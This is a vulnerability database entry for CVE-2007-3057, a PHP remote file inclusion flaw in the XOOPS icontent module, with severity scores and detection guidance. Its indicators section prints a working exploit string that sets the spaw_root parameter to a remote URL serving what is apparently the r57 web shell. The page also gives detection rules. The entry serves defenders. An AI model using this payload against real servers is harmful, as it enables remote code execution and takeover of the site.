cbcvebase.
CVE-2007-3057
published 2007-06-06

CVE-2007-3057: PHP remote file inclusion vulnerability in include/wysiwyg/spaw_control.class.php in the icontent 4.5 module for XOOPS allows remote attackers to execute…

PriorityP348medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
68.67%
99.3th percentile
PHP remote file inclusion vulnerability in include/wysiwyg/spaw_control.class.php in the icontent 4.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.

Affected

1 ranges
VendorProductVersion rangeFixed in
xoopsicontent_module

Detection & IOCsextracted from sources · hover to see the quote

path/modules/icontent/include/wysiwyg/spaw_control.class.php
urlhttp://lppm.uns.ac.id/r57.txt?
filenamespaw_control.class.php
command?spaw_root=http://lppm.uns.ac.id/r57.txt?
  • Detect HTTP requests targeting the vulnerable file path with a remote URL supplied in the spaw_root parameter
  • Alert on GET/POST requests to /modules/icontent/include/wysiwyg/spaw_control.class.php containing 'spaw_root=' with an http:// or https:// value (remote file inclusion pattern)
  • ·This issue is noted as likely a duplicate of an earlier CVE; verify whether the same vulnerable file is already covered under CVE-2006-4656 to avoid duplicate alerting
  • ·The exploit targets both icontent v1.0 and v4.5; detection rules should cover both version paths if directory structures differ
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.